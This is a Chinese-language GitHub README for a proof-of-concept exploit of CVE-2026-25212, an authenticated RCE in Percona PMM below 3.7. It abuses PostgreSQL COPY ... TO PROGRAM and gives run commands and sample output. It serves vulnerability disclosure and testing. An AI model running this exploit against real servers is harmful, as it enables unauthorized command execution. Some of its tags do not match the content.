5170Temp/CVE-2026-25212
GitHub: 5170Temp/CVE-2026-25212
该 PoC 验证了 Percona PMM 3.7 以下版本中因内部 PostgreSQL 超级用户权限未正确降权而导致的已认证远程代码执行漏洞。
Stars: 1 | Forks: 0
# CVE-2026-25212 – Percona PMM RCE PoC
**严重** – CVSS 9.9 – PMM < 3.7 中的已认证远程代码执行。
## 描述
本 PoC 利用了一个漏洞,即 PMM 中的内部 PostgreSQL 用户保留了 'SUPERUSER' 权限。已认证的攻击者(拥有 'pmm-admin' 权限)可以滥用“添加数据源”功能,并利用 PostgreSQL 的 'COPY ... TO PROGRAM' 执行任意 OS 命令。
**受影响版本:** PMM < 3.7
**修复版本:** PMM 3.7(及更高版本)
## 环境要求
- Python 3.6+
- `requests` (`pip install requests`)
## 用法
```
git clone https://github.com/5170Temp/CVE-2026-25212
cd CVE-2026-25212
pip install requests
```
COOKIE_VALUE 是你的 grafana_session cookie 值,例如 3131e17e1653ee4eeceb703fac45c717
```
python3 poc.py -t https://pmm.example.com --cookie "COOKIE_VALUE" -c "id"
```
示例输出:
```
[+] UID: krfbxa-Dk
base
global
pg_commit_ts
pg_dynshmem
pg_hba.conf
pg_ident.conf
pg_logical
pg_multixact
pg_notify
pg_replslot
pg_serial
pg_snapshots
pg_stat
pg_stat_tmp
pg_subtrans
pg_tblspc
pg_twophase
PG_VERSION
pg_wal
pg_xact
postgresql.auto.conf
postgresql.conf
postmaster.opts
postmaster.pid
[+] Done
```
标签:Percona PMM, PoC, PostgreSQL, Python, XXE攻击, 安全, 无后门, 暴力破解, 测试用例, 编程工具, 超时处理, 远程代码执行, 逆向工具